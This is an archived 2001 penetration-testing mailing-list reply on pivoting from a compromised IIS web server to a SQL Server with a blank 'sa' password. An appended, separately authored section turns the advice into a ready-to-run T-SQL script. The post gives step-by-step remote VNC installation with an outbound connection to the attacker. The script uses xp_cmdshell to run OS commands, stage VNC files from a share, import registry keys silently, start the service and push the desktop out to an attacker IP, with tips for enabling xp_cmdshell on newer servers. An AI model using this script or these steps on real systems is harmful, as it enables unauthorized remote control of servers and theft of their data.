Re: [PEN-TEST] Web Server to SQL Server

From: H D Moore (hdmat_private)
Date: Thu Apr 12 2001 - 20:54:00 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    There are a few ways to go about this:
    
    1. Upload a tool to the IIS box which runs a SQL query against the
    database server.  You could try sqlexec.exe (packetstorm) or even create an
    ASP script on the server which relays a request to the database server. If the
    /msadc RDS component is available you can try using my sqlrds.pl tool to
    relay a request to the server through that.  The sqlrds.pl script is available from
    http://www.digitaloffense.net/csw/
    
    2. Get a GUI interface on the IIS server.  Install VNC on the IIS server after
    elevating your access with hk.exe or cmdasp.asp. You can run the VNC
    server in outbound mode and run the client in listen mode, so that should
    get you through the firewall.  To install VNC remotely:
    
    a. Install VNC on a local machine, set a password and any options.
    b. Open RegEdit, export the HKLM/Software/ORL key to a file.
    c. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to the target's \winnt\system32 directory
    d. Copy your exported registry file to the target, import with regedit <filename>.reg
    e. Execute winvnc -install on the target system
    f. Execute net start winvnc
    g. Execute vncviewer -listen on the attacking system
    h. Execute winvnc -connect <your ip> and enjoy your desktop ;)
    
    3. Owning the SQL server.  With a blank "sa" account, this should be trivial. Just execute
    the xp_cmdshell stored procedure and follow the above steps to get a VNC desktop.
    
    For more info, check out my CanSecWest/core01 presentation, available online at
    http://www.digitaloffense.net/csw/ or read the excellent material available from
    http://www.sqlsecurity.com/
    
    - -HD
    
    Senior Security Analyst
    Digital Defense Incorporated
    http://www.digitaldefense.net/
    
    
    On Wednesday 11 April 2001 10:52 pm, myrddin_eat_private wrote:
    > Once I have done this, the only traffic into the internal network allowed
    > from the IIS server will be on port 1433. The SQL server will have a blank
    > 'sa' password. How would I then proceed to bust the SQL server? I know I
    > can do this if I install Perl on the IIS server and place the needed tools
    > on the box, but that requires GUI access to the IIS server (right?). Other
    > than setting up a port redirector like FPipe, how would you go about this?
    >
    > Free, encrypted, secure Web-based email at www.hushmail.com
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 6.5.8
    
    iQA/AwUBOtZ4WTwRvqMPEDLhEQImKgCfSCpzTLunnAc0jF9GhrkRCbwHJ9gAoIsH
    Fy1y25z9JgJ7LvpLbLi6VrAu
    =gcga
    -----END PGP SIGNATURE-----
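Added example, not part of the original post or any of the tools it names: HD's step 3 (the blank-"sa" path) carried out as T-SQL, with the copy/regedit/install/start/connect sequence from his step 2 driven through xp_cmdshell instead of typed at a console. It is what you would feed to osql from the IIS box over the one open port (tcp/1433). The server name, the IP addresses, the staging share and the WINNT paths are assumptions chosen for the example.

```sql
-- Added example (not from the original post). Run from the IIS host, e.g.
--   osql -S 10.0.0.20 -U sa -P "" -i own.sql
-- Assumed: SQL Server at 10.0.0.20, a share \\10.0.0.10\tools holding the VNC
-- files and the exported ORL registry key, attacker's viewer at 192.168.1.5.

-- 1. Confirm who we are. xp_cmdshell requires sysadmin; "sa" always is.
SELECT @@SERVERNAME           AS server,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,   -- 1 means we are in
       @@VERSION              AS version;
GO

-- 2. Prove OS command execution and read the output back over the same
--    connection. xp_cmdshell runs as the MSSQLSERVER service account, so
--    what you see here is what every later command will run as.
CREATE TABLE #out (line NVARCHAR(255) NULL);
INSERT INTO #out EXEC master..xp_cmdshell 'ipconfig';
SELECT line FROM #out WHERE line IS NOT NULL;
GO

-- 3. Stage WinVNC (the files and the .reg exported in step 2 of the post)
--    on the SQL server. The share is an assumption; with the IIS box already
--    under your control, a share created there is one place to put them.
EXEC master..xp_cmdshell 'copy \\10.0.0.10\tools\winvnc.exe        C:\WINNT\system32\';
EXEC master..xp_cmdshell 'copy \\10.0.0.10\tools\vnchooks.dll      C:\WINNT\system32\';
EXEC master..xp_cmdshell 'copy \\10.0.0.10\tools\omnithread_rt.dll C:\WINNT\system32\';
EXEC master..xp_cmdshell 'copy \\10.0.0.10\tools\vnc.reg           C:\WINNT\system32\';
GO

-- 4. Import the key silently (/s suppresses the confirmation dialog, which
--    would otherwise hang a non-interactive service), register and start.
EXEC master..xp_cmdshell 'regedit /s C:\WINNT\system32\vnc.reg';
EXEC master..xp_cmdshell 'C:\WINNT\system32\winvnc.exe -install';
EXEC master..xp_cmdshell 'net start winvnc';
GO

-- 5. Check the service really came up, then push the desktop outbound to a
--    viewer already waiting in listen mode (vncviewer -listen on 192.168.1.5).
DELETE FROM #out;
INSERT INTO #out EXEC master..xp_cmdshell 'net start';
SELECT line FROM #out WHERE line LIKE '%VNC%';
EXEC master..xp_cmdshell 'C:\WINNT\system32\winvnc.exe -connect 192.168.1.5';
GO

DROP TABLE #out;
GO
```

Two things to check before relying on this. First, whether the service account can actually read the share: xp_cmdshell inherits the SQL service's identity, and if that is LocalSystem it will only reach the share anonymously, so the copy step may need the share opened up or the files delivered another way. Second, on SQL Server 2005 and later xp_cmdshell is disabled by default and has to be switched on first with `EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;` (after enabling advanced options); on the SQL 7/2000 servers the post is about it is available to sysadmin out of the box.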
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:18:06 PDT